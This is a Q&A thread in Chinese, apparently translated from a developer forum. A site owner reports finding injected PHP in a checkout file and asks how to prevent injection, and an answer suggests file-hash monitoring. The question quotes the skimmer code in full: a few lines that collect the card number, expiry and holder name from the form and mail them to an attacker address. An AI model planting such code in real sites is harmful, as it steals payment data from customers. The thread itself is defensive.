0

我只是在我们创建的网站中重新测试流程,当我到达结帐部分时,我意识到页面中有一些我们从未编写过的代码。这是一次注射,它真的让我们害怕。该代码只是作为文本放在其中一个签出文件中,因此它不会执行,因为它不在 PHP 标记中,但它非常可怕。

该代码本质上是发布支付指令的每个字段(卡上的名称、卡类型、卡号、cvc、到期日期),然后执行 mail() php 函数以将信息发送到特定的电子邮件。我什至有黑客的电子邮件!!

$message .= "Number : ".$_POST['card_number']."\n";
$message .= "Cvv : ".$_POST['card_brand']."\n";
$message .= "exp : ".$_POST['card_expiration']."\n";
$message .= "Name : ".$_POST['card_holder']."\n";
$i = "______@yahoo.fr";
$subject = "cc";
mail($i,$subject,$message);

我们如何避免在我们的网站中注入 PHP?我联系了支持我们付款的 Stripe,以检查他们的 API 是否足够安全。我觉得是这样的。然而,邮寄信息和其他与付款无关的信息很容易被这样的注入攻击。我们如何避免文件中的注入?

谢谢!!

4

1 回答 1

1

这需要一个相当聪明的机器人来检测它并将其注入正确的位置。有人可以访问 FTP 或上传了一个 PHP 文件管理器——这可能来自文件上传脚本。

清理完所有内容后,也许您可​​以对文件进行“哈希快照”..然后扫描它们(自动或手动)以测试哈希更改。如果文件中有任何更改,文件的哈希值也会更改 - 然后您可以让它提醒某人。从那里,您可以浏览日志并尝试找出它的来源。

只是一个想法。

于 2013-06-28T16:16:27.980 回答